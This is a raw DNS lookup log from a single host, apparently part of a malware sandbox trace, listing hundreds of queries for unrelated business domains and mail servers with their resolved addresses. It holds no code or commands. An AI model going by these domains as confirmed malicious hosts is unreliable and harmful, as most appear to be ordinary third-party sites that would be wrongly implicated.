                                                                                                                                                                              Sep 15, 2023 07:27:24.869596958 CEST8.8.8.8192.168.2.30x4b39No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.869596958 CEST8.8.8.8192.168.2.30x4b39No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.869596958 CEST8.8.8.8192.168.2.30x4b39No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.879280090 CEST8.8.8.8192.168.2.30xcb6aName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.901761055 CEST8.8.8.8192.168.2.30x8ac4No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.920088053 CEST8.8.8.8192.168.2.30xe00bNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.001410961 CEST8.8.8.8192.168.2.30x1794Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.071074963 CEST8.8.8.8192.168.2.30xb73aNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.116672039 CEST8.8.8.8192.168.2.30xb583No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.179045916 CEST8.8.8.8192.168.2.30x5a46Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.187247992 CEST8.8.8.8192.168.2.30x48bdNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.355840921 CEST8.8.8.8192.168.2.30xb3e1No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.433051109 CEST8.8.8.8192.168.2.30x370bNo error (0)mjrcpas.com204.11.56.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.447249889 CEST8.8.8.8192.168.2.30xb47fNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.664941072 CEST8.8.8.8192.168.2.30x875eNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.695700884 CEST8.8.8.8192.168.2.30x6912Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.818989038 CEST8.8.8.8192.168.2.30xc1ceNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.818989038 CEST8.8.8.8192.168.2.30xc1ceNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.818989038 CEST8.8.8.8192.168.2.30xc1ceNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.818989038 CEST8.8.8.8192.168.2.30xc1ceNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.820774078 CEST8.8.8.8192.168.2.30x8acNo error (0)vivastay.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.820774078 CEST8.8.8.8192.168.2.30x8acNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.820774078 CEST8.8.8.8192.168.2.30x8acNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.820774078 CEST8.8.8.8192.168.2.30x8acNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.878233910 CEST8.8.8.8192.168.2.30x9414No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.977159977 CEST8.8.8.8192.168.2.30x7f0bNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.994808912 CEST8.8.8.8192.168.2.30xbf78No error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.994808912 CEST8.8.8.8192.168.2.30xbf78No error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.322444916 CEST8.8.8.8192.168.2.30x5a6bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.404299974 CEST8.8.8.8192.168.2.30x2c4eName error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.427018881 CEST8.8.8.8192.168.2.30x706Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.472285986 CEST8.8.8.8192.168.2.30x123No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.550400019 CEST8.8.8.8192.168.2.30x30d9Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.600728035 CEST8.8.8.8192.168.2.30x15b3No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.623601913 CEST8.8.8.8192.168.2.30xa1e5Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.658404112 CEST8.8.8.8192.168.2.30x178bNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.658404112 CEST8.8.8.8192.168.2.30x178bNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.685323000 CEST8.8.8.8192.168.2.30xbbf6No error (0)yhsll.com38.36.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.689078093 CEST8.8.8.8192.168.2.30x8963Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.727385998 CEST8.8.8.8192.168.2.30xcba1Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.831480980 CEST8.8.8.8192.168.2.30x65ecName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.866647005 CEST8.8.8.8192.168.2.30xec39No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.881252050 CEST8.8.8.8192.168.2.30x85f5No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.907187939 CEST8.8.8.8192.168.2.30x2d0bNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.052398920 CEST8.8.8.8192.168.2.30x2a5dNo error (0)kayoaiba.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.262975931 CEST8.8.8.8192.168.2.30xf364No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.332134008 CEST8.8.8.8192.168.2.30x5a6bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.346259117 CEST8.8.8.8192.168.2.30x51fNo error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.399470091 CEST8.8.8.8192.168.2.30x2df1No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.399470091 CEST8.8.8.8192.168.2.30x2df1No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.399470091 CEST8.8.8.8192.168.2.30x2df1No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.399470091 CEST8.8.8.8192.168.2.30x2df1No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.419785976 CEST8.8.8.8192.168.2.30x1293No error (0)anduran.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.419785976 CEST8.8.8.8192.168.2.30x1293No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.419785976 CEST8.8.8.8192.168.2.30x1293No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.419785976 CEST8.8.8.8192.168.2.30x1293No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.442630053 CEST8.8.8.8192.168.2.30xc8d7Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.445729971 CEST8.8.8.8192.168.2.30xfaa7No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.468962908 CEST8.8.8.8192.168.2.30x5ba4No error (0)gmail-smtp-in.l.google.com172.253.63.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.471137047 CEST8.8.8.8192.168.2.30x136aServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.691251040 CEST8.8.8.8192.168.2.30xb02eNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.726078987 CEST8.8.8.8192.168.2.30xe5cfNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.793104887 CEST8.8.8.8192.168.2.30x938cServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.852417946 CEST8.8.8.8192.168.2.30x8469No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.871506929 CEST8.8.8.8192.168.2.30x5f54No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.913427114 CEST8.8.8.8192.168.2.30xa0d0No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.215583086 CEST8.8.8.8192.168.2.30x13caServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.233258963 CEST8.8.8.8192.168.2.30x6005No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.322051048 CEST8.8.8.8192.168.2.30x1c60No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.344118118 CEST8.8.8.8192.168.2.30x5a6bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.451967955 CEST8.8.8.8192.168.2.30x1aaeNo error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.451967955 CEST8.8.8.8192.168.2.30x1aaeNo error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.523798943 CEST8.8.8.8192.168.2.30x4784Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.764018059 CEST8.8.8.8192.168.2.30x1935No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:28.985380888 CEST8.8.8.8192.168.2.30xdb3dNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.113765955 CEST8.8.8.8192.168.2.30xf3b5No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.115464926 CEST8.8.8.8192.168.2.30xe7bfNo error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.142642021 CEST8.8.8.8192.168.2.30xa35cNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.142642021 CEST8.8.8.8192.168.2.30xa35cNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.282718897 CEST8.8.8.8192.168.2.30xefc8No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.412123919 CEST8.8.8.8192.168.2.30xe7c5No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.437427998 CEST8.8.8.8192.168.2.30xbb3fNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.507509947 CEST8.8.8.8192.168.2.30x1b08No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:29.864518881 CEST8.8.8.8192.168.2.30x5fffNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.004587889 CEST8.8.8.8192.168.2.30xd703No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.008718967 CEST8.8.8.8192.168.2.30x453Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.114857912 CEST8.8.8.8192.168.2.30x5247Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.200150013 CEST8.8.8.8192.168.2.30xb55eName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.232659101 CEST8.8.8.8192.168.2.30xe0e3Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.310786009 CEST8.8.8.8192.168.2.30xf98cName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.363436937 CEST8.8.8.8192.168.2.30x5a6bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.412488937 CEST8.8.8.8192.168.2.30x8dd6Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.520785093 CEST8.8.8.8192.168.2.30x21cNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.520785093 CEST8.8.8.8192.168.2.30x21cNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.536456108 CEST8.8.8.8192.168.2.30x9444No error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.608041048 CEST8.8.8.8192.168.2.30xa256No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.608041048 CEST8.8.8.8192.168.2.30xa256No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.612623930 CEST8.8.8.8192.168.2.30x8bb4No error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.667653084 CEST8.8.8.8192.168.2.30x827cNo error (0)shittas.com192.3.246.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.719002962 CEST8.8.8.8192.168.2.30xd982No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.859308958 CEST8.8.8.8192.168.2.30x85c6No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:30.859308958 CEST8.8.8.8192.168.2.30x85c6No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.071413994 CEST8.8.8.8192.168.2.30xab3bNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.300601959 CEST8.8.8.8192.168.2.30x2279No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.491786003 CEST8.8.8.8192.168.2.30xd6b6No error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.648369074 CEST8.8.8.8192.168.2.30x5a7cName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.688839912 CEST8.8.8.8192.168.2.30xb22fNo error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.748744965 CEST8.8.8.8192.168.2.30x9405Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.788712978 CEST8.8.8.8192.168.2.30xcdcdNo error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.841433048 CEST8.8.8.8192.168.2.30xf47dNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:31.925987959 CEST8.8.8.8192.168.2.30x2ce4Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.017458916 CEST8.8.8.8192.168.2.30xbadNo error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.122755051 CEST8.8.8.8192.168.2.30x88d2No error (0)x96.com104.21.73.229A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.122755051 CEST8.8.8.8192.168.2.30x88d2No error (0)x96.com172.67.167.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.217797041 CEST8.8.8.8192.168.2.30x470aNo error (0)ifesnet.com104.21.24.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.217797041 CEST8.8.8.8192.168.2.30x470aNo error (0)ifesnet.com172.67.216.194A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.274194002 CEST8.8.8.8192.168.2.30x63a5No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.648654938 CEST8.8.8.8192.168.2.30x65b0No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.648654938 CEST8.8.8.8192.168.2.30x65b0No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.697815895 CEST8.8.8.8192.168.2.30x1359Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.821440935 CEST8.8.8.8192.168.2.30xf476Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.928112984 CEST8.8.8.8192.168.2.30x8a48Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.937598944 CEST8.8.8.8192.168.2.30xc7c4No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.937598944 CEST8.8.8.8192.168.2.30xc7c4No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.941042900 CEST8.8.8.8192.168.2.30x3109No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.955121040 CEST8.8.8.8192.168.2.30x2ad8No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.955121040 CEST8.8.8.8192.168.2.30x2ad8No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.955121040 CEST8.8.8.8192.168.2.30x2ad8No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:32.955121040 CEST8.8.8.8192.168.2.30x2ad8No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.038451910 CEST8.8.8.8192.168.2.30xc770No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.144464016 CEST8.8.8.8192.168.2.30xf773No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.480731010 CEST8.8.8.8192.168.2.30xe4bcNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.787681103 CEST8.8.8.8192.168.2.30x6dbeNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:33.939523935 CEST8.8.8.8192.168.2.30x79edNo error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.046274900 CEST8.8.8.8192.168.2.30x431bName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.109939098 CEST8.8.8.8192.168.2.30x2649No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.286094904 CEST8.8.8.8192.168.2.30xfce0Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.389825106 CEST8.8.8.8192.168.2.30x1699Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.430555105 CEST8.8.8.8192.168.2.30xfcdName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.506412029 CEST8.8.8.8192.168.2.30xc680No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.537034035 CEST8.8.8.8192.168.2.30x8f84Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.573484898 CEST8.8.8.8192.168.2.30xf98dNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.617207050 CEST8.8.8.8192.168.2.30xf98dNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:34.646008015 CEST8.8.8.8192.168.2.30x7970Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.599652052 CEST8.8.8.8192.168.2.30xf98dNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.649100065 CEST8.8.8.8192.168.2.30xc20aNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.649100065 CEST8.8.8.8192.168.2.30xc20aNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.729883909 CEST8.8.8.8192.168.2.30x41b9No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.755378008 CEST8.8.8.8192.168.2.30x72edNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:35.755378008 CEST8.8.8.8192.168.2.30x72edNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.032819986 CEST8.8.8.8192.168.2.30xa28aNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.032819986 CEST8.8.8.8192.168.2.30xa28aNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.032819986 CEST8.8.8.8192.168.2.30xa28aNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.433222055 CEST8.8.8.8192.168.2.30x9c23No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.640309095 CEST8.8.8.8192.168.2.30x98c4Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.714790106 CEST8.8.8.8192.168.2.30x765cNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.797437906 CEST8.8.8.8192.168.2.30x7a4fName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:36.997212887 CEST8.8.8.8192.168.2.30x65baName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.065056086 CEST8.8.8.8192.168.2.30xe4No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.136514902 CEST8.8.8.8192.168.2.30x88a6No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.136514902 CEST8.8.8.8192.168.2.30x88a6No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.136514902 CEST8.8.8.8192.168.2.30x88a6No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.213712931 CEST8.8.8.8192.168.2.30xe4a5Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.401940107 CEST8.8.8.8192.168.2.30x49c8No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.401940107 CEST8.8.8.8192.168.2.30x49c8No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.402120113 CEST8.8.8.8192.168.2.30xf8c6No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.591577053 CEST8.8.8.8192.168.2.30x5f3aName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.610042095 CEST8.8.8.8192.168.2.30x37aNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:37.635137081 CEST8.8.8.8192.168.2.30x98c4Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.453788996 CEST8.8.8.8192.168.2.30x17ebNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:38.609323025 CEST8.8.8.8192.168.2.30x2ea8No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
